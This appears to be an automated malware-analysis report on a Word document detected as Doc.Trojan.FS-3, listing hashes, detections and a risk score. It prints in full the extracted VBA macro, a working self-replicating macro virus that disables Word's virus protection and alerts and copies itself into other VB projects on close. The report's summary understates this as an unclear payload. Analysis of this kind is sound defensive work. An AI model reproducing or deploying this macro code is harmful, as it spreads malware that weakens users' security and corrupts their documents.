Office (OLE) malware analysis — malicious · 261eb040020b9a9b

MALICIOUS

Office (OLE)

26.0 KB Created: 1999-08-16 08:04:00 Authoring application: Microsoft Word 9.0 First seen: 2012-06-14

MD5: 2ac551af2192ca46d8d7d621806cb2ac SHA-1: c8a53ad50f9d9cc8e45828f09767341ce5b0d399 SHA-256: 261eb040020b9a9b081dbd6360c9fb4f464b4d497ffef435e744c29dabe28dfc

80 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic

The file contains VBA macros that attempt to disable virus protection and other security alerts within Microsoft Word. The macro code is obfuscated and appears designed to prepare the document for further malicious actions, though the exact payload is not directly discernible from the provided script.

Heuristics 2

ClamAV: Doc.Trojan.FS-3 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Trojan.FS-3
VBA macros detected medium OLE_VBA_MACROS

Document contains VBA macro code

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 831 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	831 bytes
SHA-256: `30345b141d52a24e3fed9df520d5264279f9df934242b5e31ae2632d69b37916`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True 'Copyright (C) 1998 by FlyShadow ~^^~ - 17th Private Sub Document_Close() On Error Resume Next Options.VirusProtection = 0 Options.SaveNormalPrompt = 0 Application.DisplayAlerts = 0 Application.ScreenUpdating = 0 Application.EnableCancelKey = 0 For Each α In VBE.VBProjects If α.Protection <> 1 And α.Description <> "17th" Then α.Description = "17th" With α.VBComponents(1).CodeModule .DeleteLines 1, .CountOfLines .AddFromString ThisDocument.VBProject.VBComponents(1).CodeModule.Lines(1, 17) End With: End If: Next End Sub

SHA-256: 30345b141d52a24e3fed9df520d5264279f9df934242b5e31ae2632d69b37916

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
'Copyright (C) 1998 by FlyShadow ~^^~ - 17th
Private Sub Document_Close()
On Error Resume Next
Options.VirusProtection = 0
Options.SaveNormalPrompt = 0
Application.DisplayAlerts = 0
Application.ScreenUpdating = 0
Application.EnableCancelKey = 0
For Each α In VBE.VBProjects
If α.Protection <> 1 And α.Description <> "17th" Then
α.Description = "17th"
With α.VBComponents(1).CodeModule
.DeleteLines 1, .CountOfLines
.AddFromString ThisDocument.VBProject.VBComponents(1).CodeModule.Lines(1, 17)
End With: End If: Next
End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.